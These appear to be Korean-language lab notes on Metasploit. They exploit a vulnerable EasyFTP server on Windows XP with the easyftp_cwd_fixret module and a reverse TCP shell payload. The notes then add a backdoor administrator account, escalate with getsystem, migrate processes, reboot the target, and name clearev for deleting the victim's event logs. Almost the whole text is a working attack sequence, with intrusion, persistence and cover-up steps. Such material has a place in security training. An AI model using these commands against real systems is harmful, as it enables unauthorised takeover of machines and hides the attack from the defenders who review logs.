Metasploit - 04. Application Attack

Application Attack

* FTP 취약점을 이용한 공격 (WindowXP eastFTP 1.7.0.11 실행)

EasyFtpServer17011.zip

설치하는 프로그램 아님 -->  실행파일임

msf> search easyftp

msf> use exploit/windows/ftp/easyftp_cwd_fixret (1번)

msf exploit(easyftp_cwd_fixret) > show options

msf exploit(easyftp_cwd_fixret) > show payloads   (장착 가능한 payload 검색)

msf exploit(easyftp_cwd_fixret) > show targets            (프로그램, 운영체제 정보 출력 - 번호 출력)

msf exploit(easyftp_cwd_fixret) > set으로 옵션 변경

* PAYLOAD windows/shell/reverse_tcp        (장착)

* RHOST 192.168.3.153                                (피해자 시스템 주소)

* LHOST 192.168.3.116                                (공격자 시스템 주소)

* TARGET 9                                                (피해자 프로그램, 운영체제 선택)

msf exploit(easyftp_cwd_fixret) > show options

[windows 화면]

msf exploit(easyftp_cwd_fixret) > exploit

• 백도어 계정 생성 및 계정 권한 상승 실시

meterpreter > shell

C:\WINDOWS\system32>net user test test1234 /add       (삭제 : net user test /delete)

C:\WINDOWS\system32>net user

C:\WINDOWS\system32>net localgroup administrators test /add

C:\WINDOWS\system32>exit

meterpreter > getsystem

meterpreter > getuid

• 타겟 시스템 재부팅

meterpreter > ps

meterpreter > migrate 1488

meterpreter > reboot

[windows 화면]

• msfdb를 삭제하고 다시 생성

# msfdb delete

# msfdb init

참고 (meterpreter 상태)

• background 명령어    : msf 프롬프트로 잠시 돌아간다.

• session -i 세션 번호   : 다시 meterpreter 프롬프트로 돌아간다.

• clearev                      : 타겟 이벤트 로그를 삭제한다.